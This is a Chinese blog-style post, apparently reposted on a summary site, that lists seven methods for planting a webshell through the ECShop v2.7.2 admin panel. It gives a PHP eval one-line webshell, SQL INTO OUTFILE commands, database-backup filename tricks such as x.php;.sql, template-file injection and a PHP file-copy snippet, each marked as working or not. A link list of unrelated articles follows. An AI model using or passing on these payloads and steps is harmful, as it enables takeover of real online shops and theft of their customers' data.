ecshop后臺拿shell個人總結七種方法 -個人工作總結
ecshop后臺拿shell個人總結七種方法2011-03-19 09:30ecshop后臺拿shell個人總結七種方法2011年03月18日星期五19:10最近想弄個ecshop做銷售。裝好ecshop V2.7.2版本之后,測試后臺拿shell。本人整理給自己看的,大家飄過就好。BY:黑貓ecshop后臺拿shell個人總結七種方法一、(本人測試已經失效)系統==數據庫管理==sql查詢(可爆出物理路徑):==創建表失敗,導不出shell==show databases;use數據庫名;create a(cmd text not null);insert into a(cmd)values(?php eval($_POST[cmd]);?);select cmd from ainto outfile導出路徑;drop table if exists a;==創建表失敗,導不出shell===二、(本人測試已經成功)前臺留個言,內容是我們的一句話木馬:?php eval($_POST[cmd]);?接著在后臺系統==數據庫管理==數據備份==選擇自定義備份,選擇ecs_feedback這張表(存放留言的表)備份文件名:x.php;.sql(x.php.sql形式出錯,菜刀鏈接不成功)然后菜刀鏈接成功三、(本人測試已經成功)1、添加會員,會員名稱插入插入一句話:?php eval($_POST[cmd]);?,其他隨便填寫。2、系統==數據庫管理==數據備份---自定義備份---選"XXX_users"(其中XXX因各站而異,是數據前綴)3、備份文件名為mm.php;.sql 4、一句話客戶端連接mm.php;.sql,地址一般為四、(本人測試已經成功)模板管理==庫項目管理==選擇myship.lbi配送方式。在文件內容最后面加入一句話代碼:?php eval($_POST[cmd]);?菜刀鏈接成功。說明:有些服務器過濾了eval導致失敗。五、(發布權限)(本人測試已經失效)代碼省略對Media沒有任何限制.直接Type=Media上傳你的'解密webshell訪問路徑為六、(測試成功,別人2011.02.05的記錄)上傳txt并且沒有過濾任何函數.于是運用到了php的文件操作…script language="php"$file=file_get_contents("C:\Inetpub\wwwroot\ecshop\data/Article/1286344719152816497.txt");if($file){$file="C:\Inetpub\wwwroot\ecshop\data/Article/1286344719152816497.txt";$newfile=C:\Inetpub\wwwroot\ecshop\data/distant.php;a.txt;copy($file,$newfile);}/script將以上代碼插入庫項目管理中的myship.ini打開即在目錄下生成distant.php;a.txt菜刀連接之…搞定.七、(本人測試已經失效)進入后臺-系統設置-Flash播放器管理-直接上傳x.php ecshop V2.7.2版本已經沒有這個選項,所以這個已經失效。
【ecshop后臺拿shell個人總結七種方法 -個人工作總結】相關文章:
1.【引用】個人學習方法總結 -個人工作總結
2.總結:個人總結的四種套瓷方法 -個人工作總結
3.個人總結觀察皮色真假的有效方法 -個人工作總結
4.幾種常見的個人博客推廣和盈利方法總結 -個人工作總結
5.選車方法總結(個人觀點僅供參考) -個人工作總結
6.、個人總結 -個人工作總結
7.個人總結 -個人工作總結
8.實習個人總結個人實習總結 -個人工作總結
这里有更多你想看的|
|
- 上一篇:軍訓心得體會與總結 軍訓心得與總結
- 下一篇:返回列表
